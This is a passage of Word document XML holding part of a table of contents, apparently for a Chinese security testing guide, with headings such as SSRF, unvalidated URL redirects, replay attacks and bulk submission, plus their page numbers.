              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>43</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="3B715994"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09" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.9 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>业务功能失效</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09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43</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:webHidden/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="06865ACF" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434510" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.9.1 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>通配符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0 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>43</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="6B567B15"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11" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.10 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>业务功能滥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11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45</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:b w:val="0"/>
                  <w:noProof/>
                  <w:webHidden/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="6FBCC432" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434512" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.10.1 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>短信定向转发</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2 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>45</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="37BF9DD6" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434513" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.10.2 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>邮件可定向转发</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3 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>46</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4D16F554" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434514" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.10.3 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>业务接口调用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4 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>46</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="04CE8883" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434515" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>2.10.4 IMAP/SMTP</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>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5 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>47</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="0257B9C6" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434516" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.10.5 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>引用第三方不可控脚本</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>/URL</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6 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>49</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="7A7E8C89" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434517" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.10.6 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>开启危险接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7 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>50</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="63E25908" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434518" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.10.7 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>未验证的</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>URL</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>跳转</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8 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>50</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="7D7E8303" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434519" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.10.8 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>服务器端请求伪造（</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>SSRF</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>）</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9 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>52</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="7974F4A2" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434520" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.10.9 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>短信内容可控</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0 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>56</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="16D9F672" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434521" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.10.10 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>邮件内容可控</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1 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>57</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="42D0362D" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434522" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.10.11 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>请求重放攻击</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2 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:t>57</w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="48BB301E" w14:textId="77777777" w:rsidR="004952DA" w:rsidRPr="00FE1E9A" w:rsidRDefault="000B549D" w:rsidP="009165FF">
            <w:pPr>
              <w:pStyle w:val="33"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Toc498434523" w:history="1">
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve">2.10.12 </w:t>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial"/>
                  <w:noProof/>
                  <w:sz w:val="21"/>
                </w:rPr>
                <w:t>批量提交</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3 \h </w:instrText>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
                <w:rPr>
                  <w:noProof/>
                  <w:webHidden/>
                </w:rPr>
              </w:r>
              <w:r w:rsidR="004952DA" w:rsidRPr="00FE1E9A">
